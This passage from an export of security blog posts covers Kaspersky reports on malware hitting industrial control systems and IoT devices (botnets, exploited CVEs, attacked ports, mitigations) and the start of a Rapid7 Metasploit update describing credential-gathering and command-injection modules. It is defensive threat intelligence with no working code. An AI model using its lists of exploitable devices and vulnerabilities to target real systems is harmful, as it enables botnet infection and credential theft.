decrease in the proportion of threats detected while scanning removable media. This is an important indicator, because such devices are often used to transfer information in industrial networks.\n\nThe other figures did not change appreciably.\n\n### Classes of malware\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130605/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-17.png>)\n\n_Malware classes, percentage of ICS computers attacked, H2 2017_\n\nTrojan malware, which is designed to penetrate the systems being attacked, deliver and launch other malware modules, remains relevant to ICS computers. The malicious code of these programs was most commonly written in scripting languages (JavaScript, Visual Basic Script, PowerShell, AutoIt in the AutoCAD format) or took the form of Windows shortcuts (.lnk) that pointed to the next malicious modules.\n\nThese Trojans most often tried to download and execute the following malware as main modules:\n\n * spyware Trojans (Trojan-Spy and Trojan-PSW)\n * ransomware (Trojan-Ransom)\n * backdoors (Backdoor)\n * remote administration tools installed without authorization (RAT)\n * Wiper type programs (KillDisk) designed to delete (wipe) data on the hard drive and render the computer unusable\n\nMalware infections of computers on an industrial network can result in the loss of control or the disruption of industrial processes.\n\n### Platforms used by malware\n\nIn the second half of 2017, we saw a significant increase in the percentage of ICS computers affected by malware written for the JavaScript platform.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130613/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-18.png>)\n\n_Platforms used by malware, percentage of ICS computers attacked, H2 2017 vs H1 2017_\n\nThe main reason for growing figures for the JavaScript platform is the increase in the number of phishing emails 
that include a loader for Trojan-Ransom.Win32.Locky.\n\nIn the latest versions of such emails, the attackers used a fax-received notification template.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130621/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-19.png>)\n\nThe phishing emails include an attachment \u2013 an obfuscated loader written in JavaScript and designed to download and execute the main malicious module from servers controlled by the attackers.\n\nIt is important to note that threat actors often attack legitimate websites in order to host malware components on these sites. Threat actors do this to hide malicious traffic behind legitimate domains to mask the traces of an attack.\n\nCryptocurrency miners also made a small contribution to the increase in the share of the JavaScript platform \u2013 both the versions for browsers and the script-based loaders of miners for the Windows platform.\n\n### Geographical distribution of attacks on industrial automation systems\n\nThe map below shows the percentages of industrial automation systems attacked to the total number of such systems in each country.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130629/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-20.png>)\n\n_Geographical distribution of attacks on industrial automation systems, H2 2017 \nPercentage of attacked ICS computers in each country_\n\nTOP 15 countries by percentage of ICS computers attacked:\n\n**#** | **Country*** | **% of systems attacked** \n---|---|--- \n1 | Vietnam | 69.6 \n2 | Algeria | 66.2 \n3 | Morocco | 60.4 \n4 | Indonesia | 60.1 \n5 | China | 59.5 \n6 | Egypt | 57.6 \n7 | Peru | 55.2 \n8 | Iran | 53.0 \n9 | India | 52.4 \n10 | Kazakhstan | 50.1 \n11 | Saudi Arabia | 48.4 \n12 | Mexico | 47.5 \n13 | Russia | 46.8 \n14 | Malaysia | 46.7 \n15 | Turkey | 44.1 \n \n*_Countries in which the number of ICS computers monitored by 
Kaspersky Lab ICS CERT was insufficient to obtain representative data sets were excluded from the ranking._\n\nThe Top 5 has remained unchanged since H1 2017.\n\nThe least affected countries in this ranking are Israel (8.6%), Denmark (13.6%), the UK (14.5%), the Netherlands (14.5%), Sweden (14.8%) and Kuwait (15.3%).\n\nEgypt has moved from ninth place to sixth \u2013 the percentage of attacked ICS machines in that country grew by 6.1 p.p. This is the most significant growth among all countries of the world. Internet threats accounted for most of the growth in the percentage of attacked ICS computers in Egypt. Among the internet threats detected, the most common were sites infected with script-based cryptocurrency miners and attempts to download malware by following URL links.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130636/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-21.png>)\n\n_Main sources of threats blocked on ICS computers in Egypt \npercentage of ICS computers attacked, H2 2017 vs H1 2017_\n\nMalware distributed via removable media is also a real problem for many ICS in Egypt. 
Malware loaders distributed on removable media are disguised as existing user files on the removable drive, increasing the chances of a successful attack.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130643/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-22.png>)\n\n_Examples of names used for loaders of malware distributed via removable media that were blocked on ICS computers in Egypt in H2 2017_\n\nIn most cases, the loaders that we detected were designed to launch the malware module responsible for infecting the system, including downloading the main module, infecting removable media and network shares and propagating via email/instant messengers to an existing list of contacts.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130652/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-23.png>)\n\n_Malicious code for the AutoIt platform, launched by a malicious .lnk loader \nblocked on an ICS computer in Egypt in H2 2017_\n\nIn Russia during H2 2017, 46.8% of ICS computers were attacked at least once \u2013 a 3.8 p.p. rise on H1 2017. This saw Russia move up from 21st to 13th.\n\nThe proportions of attacked ICS machines vary greatly between different regions of the world.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130701/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-24.png>)\n\n_Percentage of ICS systems attacked in regions of the world, H2 2017 vs H1 2017_\n\nAll regions can be assigned to one of three groups according to the percentage of attacked ICS machines:\n\n 1. Proportion of attacked ICS systems below 30%. This group includes North America and Europe, where the situation looks the most peaceful. 
Kaspersky Lab ICS CERT specialists say this does not necessarily mean that industrial enterprises in these regions are less frequently attacked by cybercriminals; rather, it could be that more attention is paid to ensuring information security at industrial enterprises in these regions, which results in fewer attacks reaching ICS.\n 2. Proportion of attacked ICS systems between 30% and 50%. This group includes Latin America, Russia and the Middle East.\n 3. Proportion of attacked ICS systems above 50%. The situation is most acute in Africa and the Asia-Pacific region.\n\nIt should be noted that values may differ significantly between countries within the same region. This may be due to different practices and approaches to ICS information security in those countries.\n\nIn particular, the Asia-Pacific region includes Vietnam with the highest global proportion of attacked ICS systems (69.6%) alongside countries such as Japan (25%), Australia (24.1%) and Singapore (23.2%), where figures did not exceed 25%.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130707/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-25.png>)\n\n_Percentage of attacked ICS computers in Asia-Pacific countries, H2 2017 vs H1 2017_\n\nIn Europe, Denmark's score (13.6%) was not only the lowest in the region but also one of the lowest globally, while the proportions of attacked ICS systems in Belarus (41%), Portugal (42.5%) and Ukraine (41.4%) were all above 40%.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130713/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-26.png>)\n\n_Percentage of attacked ICS computers in Europe, H2 2017 vs H1 2017_\n\nLet's now look at the sources of attacks that affected ICS systems in different 
regions.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130719/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-27.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130725/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-28.png>)\n\n_Main sources of threats blocked on ICS computers in different regions, H2 2017_\n\nIn all regions of the world, the internet remains the main source of attacks. However, in Europe and North America, the percentage of blocked web-borne attacks is substantially lower than elsewhere. This may be because most enterprises operating in those regions adhere to information security standards. In particular, internet access is restricted on systems that are part of industrial networks. The situation is similar for infected removable devices: the highest numbers are seen in Africa and the Asia-Pacific region, while the lowest are in Europe and North America. These figures also reflect the level of compliance with information security standards and, in particular, whether restrictions are in place to prevent the connection of unauthorized removable media to industrial infrastructure systems.\n\nCuriously, in spite of the fairly high overall percentage of attacks that reached ICS systems, the percentages of ICS computers attacked via removable media and email clients in Russia were relatively small \u2013 4.4% and 1.4% respectively. One possible explanation is that risks associated with these attack vectors are largely mitigated through organizational measures, as well as removable media and email handling practices established at industrial enterprises. 
This interpretation is reassuring, since removable media and email are often used as penetration vectors in sophisticated targeted and APT attacks.\n\nFor countries of the Middle East, email was a significant (5%) source of infection, with the region leading the ranking based on this parameter.\n\n## Our recommendations\n\nTo prevent accidental infections in industrial networks, we recommend taking a set of measures designed to secure the internal and external perimeters of these networks.\n\nThis includes, first and foremost, measures required to provide secure remote access to automation systems and secure transfer of data between the industrial network and other networks that have different trust levels:\n\n * Systems that have full-time or regular connections to external networks (mobile devices, VPN concentrators, terminal servers, etc.) should be isolated into a separate segment of the industrial network \u2013 the demilitarized zone (DMZ);\n * Systems in the demilitarized zone should be divided into subnets or virtual subnets (VLAN), with restricted access between subnets (only the communications that are required should be allowed);\n * All the necessary communication between the industrial network and the outside world (including the enterprise's office network) should be performed via the DMZ;\n * If necessary, terminal servers that support reverse connection methods (from the industrial network to the DMZ) can be deployed in the DMZ;\n * Thin clients should be used whenever possible to access the industrial network from the outside (using reverse connection methods);\n * Access from the demilitarized zone to the industrial network should be blocked;\n * If the enterprise's business processes are compatible with one-way communication, we recommend that you consider using data diodes.\n\nThe threat landscape for industrial automation systems is continually changing, with new vulnerabilities regularly found both in application software and in industrial 
software. Based on the threat evolution trends identified in H2 2017, we recommend placing special emphasis on the following security measures:\n\n * Regularly updating the operating systems, application software and security solutions on systems that are part of the enterprise's industrial network;\n * Installing firmware updates on control devices used in industrial automation systems in a timely manner;\n * Restricting network traffic on ports and protocols used on the edge routers between the organization's network and those of other companies (if information is transferred from one company's industrial network to another company);\n * An emphasis on account control and password policies is recommended. Users should have only those privileges that are required for them to perform their responsibilities. The number of user accounts with administrative privileges should be as limited as possible. Strong passwords (at least 9 characters, both upper and lower case, combined with digits and special characters) should be used, with regular password changing enforced by the domain policy, for example, every 90 days.\n\nTo provide protection from accidental infections with new, previously unknown malware and targeted attacks, we recommend doing the following on a regular basis:\n\n 1. Taking an inventory of running network services on all hosts of the industrial network; where possible, stopping vulnerable network services (unless this will jeopardize the continuity of industrial processes) and other services that are not directly required for the operation of the automation system; special emphasis should be made on services that provide remote access to file system objects, such as SMB/CIFS and/or NFS (which is relevant in the case of attacks on systems running Linux).\n 2. Auditing ICS component access control; trying to achieve maximum access granularity.\n 3. Auditing the network activity in the enterprise's industrial network and at its boundaries. 
Eliminate any network connections with external and other adjacent information networks that are not required by industrial processes.\n 4. Verifying the security of remote access to the industrial network; placing a special emphasis on whether demilitarized zones are set up in compliance with IT security requirements. To the fullest extent possible, minimizing or completely eliminating the use of remote administration tools (such as RDP or TeamViewer). More details on this are provided above.\n 5. Ensuring that signature databases, heuristics and decision algorithms of endpoint security solutions are up to date. Checking that all the main protection components are enabled and running and that ICS software folders, OS system folders or user profiles are not excluded from the scope of protection. Application startup control technologies configured in whitelisting mode and application behavior analysis technologies are particularly effective for industrial enterprises. Application startup control will prevent cryptomalware from running even if it finds its way onto the computer, while application behavior analysis technologies are helpful for detecting and blocking attempts to exploit vulnerabilities (including unknown ones) in legitimate software.\n 6. Auditing policies and practices related to using removable media and portable devices. Blocking devices that provide illegitimate access to external networks and the Internet from being connected to industrial network hosts. Wherever possible, disabling the relevant ports or controlling access to these ports using properly configured dedicated tools.\n\nIn addition, to provide protection from targeted attacks directed at the enterprise's industrial network and its main industrial assets, we recommend deploying tools that provide network traffic monitoring and detection of cyberattacks on industrial networks. 
In most cases, such measures do not require any changes to ICS components or their configuration and can be carried out without suspending their operation.\n\nOf course, completely isolating the industrial network from adjacent networks is virtually impossible, since transferring data between networks is required to perform a variety of important functions \u2013 controlling and maintaining remote facilities, coordinating sophisticated industrial processes, parts of which are distributed between numerous workshops, lines, plants and support systems. We hope, however, that our recommendations will help you provide maximum protection for your industrial networks and automation systems against existing and future threats.\n\n_**Kaspersky Lab Industrial Control Systems Cyber Emergency Response Team (Kaspersky Lab ICS CERT)** is a global project of Kaspersky Lab aimed at coordinating the work of industrial automation system vendors, owners and operators of industrial facilities and IT security researchers in addressing issues associated with protecting industrial enterprises and critical infrastructure facilities._\n\n[ **Read the full \"Threat Landscape for Industrial Automation Systems in H2 2017\" report (English, PDF)**](<https://ics-cert.kaspersky.com/media/KL_ICS_REPORT_H2-2017_FINAL_EN_22032018.pdf>)", "cvss3": {}, "published": "2018-03-26T10:00:27", "type": "securelist", "title": "Threat Landscape for Industrial Automation Systems in H2 2017", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2014-8361", "CVE-2017-8759"], "modified": "2018-03-26T10:00:27", "id": "SECURELIST:D257E8B7FC070ED8409973F0F9A689E6", "href": "https://securelist.com/threat-landscape-for-industrial-automation-systems-in-h2-2017/85053/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-28T10:13:53", "description": "\n\nCybercriminals' interest in IoT devices continues to grow: in H1 2018 we picked up three times 
as many malware samples attacking smart devices as in the whole of 2017. And in 2017 there were ten times more than in 2016. That doesn't bode well for the years ahead.\n\nWe decided to study what attack vectors are deployed by cybercriminals to infect smart devices, what malware is loaded into the system, and what it means for device owners and victims of freshly armed botnets.\n\n_Number of malware samples for IoT devices in Kaspersky Lab's collection, 2016-2018._ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/09/17153718/en-iot-malware-collection.png>)\n\nOne of the most popular attack and infection vectors against devices remains cracking Telnet passwords. In Q2 2018, there were three times as many such attacks against our [honeypots](<https://encyclopedia.kaspersky.com/glossary/honeypot-glossary/>) as all other types combined.\n\n**Service** | **% of attacks** \n---|--- \n**Telnet** | 75.40% \n**SSH** | 11.59% \n**Other** | 13.01% \n \nWhen it came to downloading malware onto IoT devices, cybercriminals' preferred option was one of the [Mirai](<https://securelist.com/is-mirai-really-as-black-as-its-being-painted/76954/>) family (20.9%).\n\n**#** | **downloaded malware** | **% of attacks** \n---|---|--- \n**1** | Backdoor.Linux.Mirai.c | 15.97% \n**2** | Trojan-Downloader.Linux.Hajime.a | 5.89% \n**3** | Trojan-Downloader.Linux.NyaDrop.b | 3.34% \n**4** | Backdoor.Linux.Mirai.b | 2.72% \n**5** | Backdoor.Linux.Mirai.ba | 1.94% \n**6** | Trojan-Downloader.Shell.Agent.p | 0.38% \n**7** | Trojan-Downloader.Shell.Agent.as | 0.27% \n**8** | Backdoor.Linux.Mirai.n | 0.27% \n**9** | Backdoor.Linux.Gafgyt.ba | 0.24% \n**10** | Backdoor.Linux.Gafgyt.af | 0.20% \n \n_Top 10 malware downloaded onto infected IoT devices following a successful Telnet password crack_\n\nAnd here are the Top 10 countries from which our traps were hit by Telnet password attacks:\n\n_Geographical distribution of the number of infected devices, Q2 2018._ 
[(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/09/17153651/en-map-infected-devices-q2-2018.png>)\n\nAs we see, in Q2 2018 the leader by number of unique IP addresses from which Telnet password attacks originated was Brazil (23%). Second place went to China (17%). Russia in our list took 4th place (7%). Overall for the period January 1 \u2013 July 2018, our Telnet honeypot registered more than 12 million attacks from 86,560 unique IP addresses, and malware was downloaded from 27,693 unique IP addresses.\n\nSince some smart device owners change the default Telnet password to one that is more complex, and many gadgets don't support this protocol at all, cybercriminals are constantly on the lookout for new ways of infection. This is stimulated by the high competition between virus writers, which has led to password bruteforce attacks becoming less effective: in the event of a successful crack, the device password is changed and access to Telnet is blocked.\n\nAn example of the use of \"alternative technology\" is the Reaper botnet, whose assets at end-2017 numbered about 2 million IoT devices. 
Instead of bruteforcing Telnet passwords, this botnet exploited known software vulnerabilities:\n\n * [Vulnerabilities in D-Link 850L router firmware](<https://blogs.securiteam.com/index.php/archives/3364>)\n * [Vulnerabilities in GoAhead IP cameras](<https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html>)\n * [Vulnerabilities in MVPower CCTV cameras](<https://www.pentestpartners.com/security-blog/pwning-cctv-cameras/>)\n * [Vulnerability in Netgear ReadyNAS Surveillance](<https://blogs.securiteam.com/index.php/archives/3409>)\n * [Vulnerability in Vacron NVR](<https://blogs.securiteam.com/index.php/archives/3445>)\n * [Vulnerability in Netgear DGN devices](<http://seclists.org/bugtraq/2013/Jun/8>)\n * [Vulnerabilities in Linksys E1500/E2500 routers](<http://www.s3cur1ty.de/m1adv2013-004>)\n * [Vulnerabilities in D-Link DIR-600 and DIR 300 - HW rev B1 routers](<http://www.s3cur1ty.de/m1adv2013-003>)\n * Vulnerabilities in AVTech devices\n\nAdvantages of this distribution method over password cracking:\n\n * Infection occurs much faster\n * It is much harder to patch a software vulnerability than change a password or disable/block the service\n\nAlthough this method is more difficult to implement, it found favor with many virus writers, and it wasn't long before new Trojans exploiting known vulnerabilities in smart device software started appearing.\n\n## New attacks, old malware\n\nTo see which vulnerabilities are targeted by malware, we analyzed data on attempts to connect to various ports on our traps. 
This is the picture that emerged for Q2 2018:\n\n**Service** | **Port** | **% of attacks** | **Attack vector** | **Malware families** \n---|---|---|---|--- \n**Telnet** | 23, 2323 | 82.26% | Bruteforce | Mirai, Gafgyt \n**SSH** | 22 | 11.51% | Bruteforce | Mirai, Gafgyt \n**Samba** | 445 | 2.78% | EternalBlue, EternalRed, CVE-2018-7445 | - \n**tr-069** | 7547 | 0.77% | [RCE in TR-069 implementation](<https://isc.sans.edu/forums/diary/TR069+NewNTPServer+Exploits+What+we+know+so+far/21763/>) | Mirai, Hajime \n**HTTP** | 80 | 0.76% | Attempts to exploit vulnerabilities in a web server or crack an admin console password | - \n**winbox (RouterOS)** | 8291 | 0.71% | [Used for RouterOS (MikroTik) authentication](<https://xakep.ru/2018/03/29/hajime-hunts-mikrotik/>) and [WinBox-based attacks](<https://threatpost.ru/mikrotik-patched-zero-day-vulnerability-in-record-time/25811/>) | Hajime \n**Mikrotik http** | 8080 | 0.23% | RCE in MikroTik RouterOS < 6.38.5 [Chimay-Red](<https://github.com/BigNerd95/Chimay-Red>) | Hajime \n**MSSQL** | 1433 | 0.21% | Execution of arbitrary code for certain versions (2000, 2005, 2008); changing administrator password; data theft | - \n**GoAhead httpd** | 81 | 0.16% | [RCE in GoAhead IP cameras](<http://blog.netlab.360.com/a-new-threat-an-iot-botnet-scanning-internet-on-port-81-en/>) | Persirai, Gafgyt \n**Mikrotik http** | 8081 | 0.15% | [Chimay-Red](<https://github.com/BigNerd95/Chimay-Red>) | Hajime \n**Ethereum JSON-RPC** | 8545 | 0.15% | [Authorization bypass (CVE-2017-12113)](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0465>) | - \n**RDP** | 3389 | 0.12% | Bruteforce | - \n**XionMai uc-httpd** | 8000 | 0.09% | [Buffer overflow (CVE-2018-10088) in XionMai uc-httpd 1.0.0 (some Chinese-made devices)](<https://www.bleepingcomputer.com/news/security/all-that-port-8000-traffic-this-week-yeah-thats-satori-looking-for-new-bots/>) | Satori \n**MySQL** | 3306 | 0.08% | Execution of arbitrary code for certain versions (2000, 2005, 2008); changing administrator password; data theft | - \n \nThe vast majority of attacks still come from Telnet and SSH password bruteforcing. The third most common are attacks against the SMB service, which provides remote access to files. We haven't seen IoT malware attacking this service yet. However, some versions of it contain serious known vulnerabilities such as EternalBlue (Windows) and EternalRed (Linux), which were used, for instance, to distribute the infamous Trojan ransomware [WannaCry](<https://securelist.com/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/78351/>) and the Monero cryptocurrency miner [EternalMiner](<https://securelist.com/sambacry-is-coming/78674/>).\n\nHere's the breakdown of possibly infected IoT devices behind the IP addresses that attacked our honeypots in Q2 2018:\n\n**Device** | **% of infected devices** \n---|--- \n**MikroTik** | 37.23% \n**TP-Link** | 9.07% \n**SonicWall** | 3.74% \n**AV tech** | 3.17% \n**Vigor** | 3.15% \n**Ubiquiti** | 2.80% \n**D-Link** | 2.49% \n**Cisco** | 1.40% \n**AirTies** | 1.25% \n**Cyberoam** | 1.13% \n**HikVision** | 1.11% \n**ZTE** | 0.88% \n**Unspecified device** | 0.68% \n**Unknown DVR** | 31.91% \n \nAs can be seen, MikroTik devices running under RouterOS are way out in front. The reason appears to be the Chimay-Red vulnerability. ~~What's interesting is that our honeypot attackers included 33 Miele dishwashers (0.68% of the total number of attacks). Most likely they were infected through the known (since March 2017) [CVE-2017-7240](<https://nvd.nist.gov/vuln/detail/CVE-2017-7240>) vulnerability in PST10 WebServer, which is used in their firmware.~~1\n\n### Port 7547\n\nAttacks against remote device management ([TR-069](<https://en.wikipedia.org/wiki/TR-069>) specification) on port 7547 are highly common. According to Shodan, there are more than 40 million devices in the world with this port open. 
And that's despite the vulnerability recently causing the infection of a million Deutsche Telekom routers, not to mention helping to spread the Mirai and Hajime malware families.\n\nAnother type of attack exploits the [Chimay-Red vulnerability](<https://wikileaks.org/ciav7p1/cms/page_16384604.html>) in MikroTik routers running under RouterOS versions below 6.38.4. In March 2018, it played an active part in distributing Hajime.\n\n### IP cameras\n\nIP cameras are also on the cybercriminal radar. In March 2017, several major vulnerabilities were detected in the software of GoAhead devices, and a month after information about it was published, there appeared new versions of the Gafgyt and Persirai Trojans exploiting these vulnerabilities. Just one week after these malicious programs were actively distributed, the number of infected devices climbed to 57,000.\n\nOn June 8, 2018, a [proof-of-concept](<https://encyclopedia.kaspersky.com/glossary/poc-proof-of-concept/>) was published for the CVE-2018-10088 vulnerability in the XionMai uc-httpd web server, used in some Chinese-made smart devices (for example, KKMoon DVRs). The next day, the number of logged attempts to locate devices using this web server more than tripled. The culprit for this spike in activity was the Satori Trojan, known for previously attacking [GPON routers](<http://blog.netlab.360.com/gpon-exploit-in-the-wild-ii-satori-botnet-en/>).\n\n## New malware and threats to end users\n\n### DDoS attacks\n\nAs before, the primary purpose of IoT malware deployment is to perpetrate DDoS attacks. Infected smart devices become part of a botnet that attacks a specific address on command, depriving the host of the ability to correctly handle requests from real users. Such attacks are still deployed by Trojans from the Mirai family and its clones, in particular, Hajime.\n\nThis is perhaps the least harmful scenario for the end user. 
The worst (and very unlikely) thing that can happen to the owner of the infected device is being blocked by their ISP. And the device can often be \"cured\" with a simple reboot.\n\n### Cryptocurrency mining\n\nAnother type of payload is linked to cryptocurrencies. For instance, IoT malware can install a miner on an infected device. But given the low processing power of smart devices, the feasibility of such attacks remains in doubt, even despite their potentially large number.\n\nA more devious and doable method of getting a couple of cryptocoins was invented by the creators of the Satori Trojan. Here, the victim IoT device acts as a kind of key that opens access to a high-performance PC:\n\n * At the first stage, the attackers try to infect as many routers as possible using known vulnerabilities, in particular: \n * [CVE-2014-8361](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8361>) \u2013 RCE in the miniigd SOAP service in Realtek SDK\n * [CVE-2017-17215](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE%202017-17215>) \u2013 RCE in the firmware of Huawei HG532 routers\n * [CVE-2018-10561](<https://nvd.nist.gov/vuln/detail/CVE-2018-10561>), [CVE-2018-10562](<https://nvd.nist.gov/vuln/detail/CVE-2018-10562>) \u2013 authorization bypass and execution of arbitrary commands on Dasan GPON routers\n * [CVE-2018-10088](<https://nvd.nist.gov/vuln/detail/CVE-2018-10088>) \u2013 buffer overflow in XiongMai uc-httpd 1.0.0 used in the firmware of some routers and other smart devices made by some Chinese manufacturers\n * At the second stage, using the compromised routers and the [CVE-2018-1000049](<https://reversebrain.github.io/2018/02/01/Claymore-Dual-Miner-Remote-Code-Execution/>) vulnerability in the [Claymore](<https://www.dualminer.ru/>) Ethereum miner remote management tool, they substitute their own wallet address for the victim's.\n\n### Data theft\n\nThe [VPNFilter](<https://securelist.com/vpnfilter-exif-to-c2-mechanism-analysed/85721/>) Trojan, detected in May 2018, pursues other 
goals, above all intercepting infected device traffic, extracting important data from it (user names, passwords, etc.), and sending it to the cybercriminals' server. Here are the main features of VPNFilter:\n\n * Modular architecture. The malware creators can fit it out with new functions on the fly. For instance, in early June 2018 a new module was detected able to inject javascript code into intercepted web pages.\n * Reboot resistant. The Trojan writes itself to the standard Linux crontab job scheduler, and can also modify the configuration settings in the non-volatile memory (NVRAM) of the device.\n * Uses TOR for communication with C&C.\n * Able to self-destruct and disable the device. On receiving the command, the Trojan deletes itself, overwrites the critical part of the firmware with garbage data, and then reboots the device.\n\nThe Trojan's distribution method is still unknown: its code contains no self-propagation mechanisms. However, we are inclined to believe that it exploits known vulnerabilities in device software for infection purposes.\n\nThe very [first VPNFilter report](<https://blog.talosintelligence.com/2018/05/VPNFilter.html>) spoke of around 500,000 infected devices. Since then, even more have appeared, and the list of manufacturers of vulnerable gadgets has expanded considerably. As of mid-June, it included the following brands:\n\n * ASUS\n * D-Link\n * Huawei\n * Linksys\n * MikroTik\n * Netgear\n * QNAP\n * TP-Link\n * Ubiquiti\n * Upvel\n * ZTE\n\nThe situation is made worse by the fact that these manufacturers' devices are used not only in corporate networks, but often as home routers.\n\n### Conclusion\n\nSmart devices are on the rise, with [some forecasts](<https://www.statista.com/statistics/764026/number-of-iot-devices-in-use-worldwide/>) suggesting that by 2020 their number will exceed the world's population several times over. 
Yet manufacturers still don't prioritize security: there are no reminders to change the default password during initial setup or notifications about the release of new firmware versions, and the updating process itself can be complex for the average user. This makes IoT devices a prime target for cybercriminals. Easier to infect than PCs, they often play an important role in the home infrastructure: some manage Internet traffic, others shoot video footage, still others control domestic devices (for example, air conditioning).\n\nMalware for smart devices is increasing not only in quantity, but also quality. More and more exploits are being weaponized by cybercriminals, and infected devices are used to steal personal data and mine cryptocurrencies, on top of traditional DDoS attacks.\n\nHere are some simple tips to help minimize the risk of smart device infection:\n\n * Don't give access to the device from an external network unless absolutely necessary\n * Periodic rebooting will help get rid of malware already installed (although in most cases the risk of reinfection will remain)\n * Regularly check for new firmware versions and update the device\n * Use complex passwords at least 8 characters long, including upper and lower-case letters, numerals, and special characters\n * Change the factory passwords at initial setup (even if the device does not prompt you to do so)\n * Close/block unused ports, if there is such an option. For example, if you don't connect to the router via Telnet (port TCP:23), it's a good idea to disable it so as to close off a potential loophole to intruders.\n\n \n\n* * *\n\n1 \u2014 The previous version of the text incorrectly stated that Kaspersky Lab honeypots, used for detecting botnets, were attacked by 33 Miele dishwashers.\n\nA Miele representative shared new details with us so we could review our earlier findings. 
\n\nWe understand that connection attempts were performed by other objects from the networks that presented the targeted IP-addresses \u2013 including, but not limited to, a router or another device within the network.\n\nWe would like to thank the company for bringing this to our attention and being able to clarify our findings. We apologize for any confusion caused.", "cvss3": {}, "published": "2018-09-18T10:00:36", "type": "securelist", "title": "New trends in the world of IoT threats", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2014-8361", "CVE-2017-12113", "CVE-2017-7240", "CVE-2018-1000049", "CVE-2018-10088", "CVE-2018-10561", "CVE-2018-10562", "CVE-2018-7445"], "modified": "2018-09-18T10:00:36", "id": "SECURELIST:2F75371B5752C888430A598DF749FD1A", "href": "https://securelist.com/new-trends-in-the-world-of-iot-threats/87991/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "rapid7blog": [{"lastseen": "2021-05-14T14:54:19", "description": "## Two new Active Directory attacks\n\n\n\nThis week we added [a pair of new post-exploitation modules](<https://github.com/rapid7/metasploit-framework/pull/11130>) from community contributor [timb-machine](<https://github.com/timb-machine>). Both modules target UNIX machines running SSSD or One Identity's Vintela Authentication Services (VAS) as Active Directory integration solutions. The new [UNIX Gather Cached AD Hashes](<https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/unix_cached_ad_hashes.md>) module can be used on a UNIX target to obtain all cached Active Directory hashes, which can then be cracked using John the Ripper. 
The second module is [UNIX Gather Kerberos Tickets](<https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/unix_kerberos_tickets.md>), which as the name suggests, can similarly be used on a vulnerable target to obtain cached Kerberos tickets.\n\n## Focusing on Micro Focus\n\nThanks to [pedrib](<https://github.com/pedrib>) for two new pull requests related to Micro Focus Operations Bridge Manager and Bridge Reporter. Pedrib contributed a new [Micro Focus Operations Bridge Reporter Unauthenticated Command Injection ](<https://github.com/rapid7/metasploit-framework/pull/15090>) module, which exploits an unauthenticated command injection vulnerability on Linux, versions 10.40 and below ([CVE-2021-22502](<https://attackerkb.com/topics/lGSaEhn81Z/cve-2021-22502?referrer=blog>)). Pedrib also [updated](<https://github.com/rapid7/metasploit-framework/pull/15087>) the existing [Micro Focus Operations Bridge Manager Local Privilege Escalation](<https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/windows/local/microfocus_operations_privesc.md>) module to also support Operations Bridge Reporter.\n\n## PR #15000!\n\nCongratulations to [pingport80](<https://github.com/pingport80>), who snagged [PR #15,000](<https://github.com/rapid7/metasploit-framework/pull/15000>)! This enhancement replaces existing usages of `which` in `Msf::Sessions::CommandShell.binary_exists` with `command -v` \u2014 a more portable solution that works consistently across different shells.\n\n## New Module Content (6)\n\n * [GravCMS Remote Command Execution](<https://github.com/rapid7/metasploit-framework/pull/15030>) by Mehmet Ince, which exploits [CVE-2021-21425](<https://attackerkb.com/topics/DXBeSBbvfn/cve-2021-21425?referrer=blog>) \\- This adds a new remote exploit module that leverages unauthenticated arbitrary YAML write/update vulnerability to get remote code execution under the context of the web server user. 
